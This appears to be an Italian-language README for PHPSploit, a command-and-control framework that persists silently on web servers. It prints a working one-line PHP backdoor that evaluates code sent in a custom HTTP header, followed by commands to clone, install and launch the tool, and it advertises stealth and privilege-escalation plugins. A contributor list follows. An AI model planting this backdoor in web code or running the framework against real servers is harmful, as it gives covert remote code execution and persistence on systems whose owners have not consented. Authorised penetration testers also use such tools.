
Framework C2 completo che persiste silenziosamente su un webserver con un backdoor PHP a riga singola
La comunicazione offuscata viene realizzata utilizzando intestazioni HTTP nelle richieste client standard e nelle relative risposte del server web, incanalata attraverso un minuscolo backdoor polimorfico:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Efficiente: Più di 20 plugin per automatizzare le attività di escalation dei privilegi
Furtivo: Il framework è fatto da paranoici, per paranoici
Comodo: Un'interfaccia robusta con molte funzionalità cruciali
help)Grazie a queste meravigliose persone:
Questo progetto segue le specifiche all-contributors. Contributi di ogni tipo sono benvenuti
![]() Sujit Ghosal 📝 |
![]() Zerdoumi 🐛 |
![]() tristandostaler 🐛 | ![]() Rohan Tarai 🐛 | ![]() Jonas Lejon 📝 |